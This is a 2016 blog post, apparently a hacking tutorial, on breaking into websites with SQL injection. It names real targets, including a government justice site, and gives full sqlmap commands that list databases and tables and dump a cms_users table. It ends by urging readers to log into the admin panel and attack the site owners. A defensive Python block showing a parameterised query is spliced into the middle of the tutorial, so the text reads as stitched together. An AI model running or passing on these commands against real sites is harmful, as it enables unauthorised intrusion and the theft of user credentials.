Wednesday, May 18, 2016

HOW TO ALMOST EVERYSITES WITH BACK TRACK



Start

- - - - - - - - - -

First of all you must find some vuln sites...

Our target is: http://www.zwcad.org/

vuln: http://www.zwcad.org/download_form.p?id=107

To see if it is vuln, try adding ' to the URL, like this:

http://www.zwcad.org/download_form.p?id=107'

- - - - - - - - - - - - - - - - - - - - - - - - - -
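Seen from the side of the site owner, the quote test above only produces a signal when the `id` value is pasted into the SQL text and the database error is shown to the client. The following is an added example, not code from the original post: it puts that weak handler next to a corrected one that validates the value, binds it as a parameter and records the rejected input. The table, file names and function names are constructed for illustration.

```python
import sqlite3
from urllib.parse import parse_qs

def make_db():
    # Constructed sample table standing in for whatever sits behind ?id=
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE downloads (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO downloads VALUES (?, ?)",
                   [(107, "viewer.zip"), (108, "manual.pdf")])
    return db

def handle_vulnerable(db, query_string):
    # Weak form: the raw value is concatenated into the SQL text, so a stray
    # quote breaks the statement and the driver error is echoed to the client.
    raw = parse_qs(query_string).get("id", [""])[0]
    try:
        rows = db.execute("SELECT name FROM downloads WHERE id = " + raw).fetchall()
    except sqlite3.Error as exc:
        return 500, "SQL error: %s" % exc
    return (200, rows[0][0]) if rows else (404, "not found")

def handle_hardened(db, query_string, rejected):
    # Corrected form: strict type check, bound parameter, generic error body.
    raw = parse_qs(query_string).get("id", [""])[0]
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 9):
        rejected.append(raw)  # keep the bad value for the security log
        return 400, "bad request"
    rows = db.execute("SELECT name FROM downloads WHERE id = ?",
                      (int(raw),)).fetchall()
    return (200, rows[0][0]) if rows else (404, "not found")

if __name__ == "__main__":
    db, rejected = make_db(), []
    for qs in ("id=107", "id=107'"):
        print(qs, handle_vulnerable(db, qs), handle_hardened(db, qs, rejected))
    print("rejected:", rejected)
```

The entries collected in `rejected` are what a defender would forward to logging or alerting, since a quote in a numeric parameter rarely comes from normal use.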

Now that we have some vuln sites we can open sqlmap...

Start>Backtrack>ation Tools>Web ation Tools>sqlmap

This is on BackTrack 5...

- - - - - - - - - - - - - - - - - - - - - - - - - - - -

Now we must type some commands..

python sqlmap.py -u http://www.justice.gov.al/index.p?gj=gj1 --dbs

It looks like this:
http://www.dodaj.rs/f/3h/Ol/2VNj3k6R/step1.jpg

When we hit ENTER the scan starts, and when the scan is over we will get the databases.

It looks like this: http://www.dodaj.rs/f/1T/10G/4I87LTyn/wewilotesomething.jpg


Then we must enter another command to start searching for tables.
That command is:

python sqlmap.py -u http://www.justice.gov.al/index.p?gj=gj1 -D justice2011DB --tables


When you hit ENTER the table search starts, and when it's over we get this info:
Picture here: http://www.dodaj.rs/f/3/O2/1tsCrIS3/tablessrching.jpg

Now we must type a third command to search for columns, but first we must choose one table to get columns from. I chose the cms_users table..

python sqlmap.py -u http://www.justice.gov.al/index.p?gj=gj1 -D justice2011DB -T cms_users --dump

And you will get this:
Picture here: http://www.dodaj.rs/f/12/1I/2Cv7DPis/end.jpg

You can do this too, step by step..
Type a command for columns:

python sqlmap.py -u http://www.justice.gov.al/index.p?gj=gj1 -D justice2011DB -T cms_users -C herethecolumnname --dump

With this command we will get info about one column..
Like this: http://www.dodaj.rs/f/38/Bc/2h9WLcuY/columnss.jpg

You can always find your dump files in: /pentest/web/scanners/sqlmap/output/

Now that we have all the info, we only need to find an admin panel and log in and FUCK THEM !!!
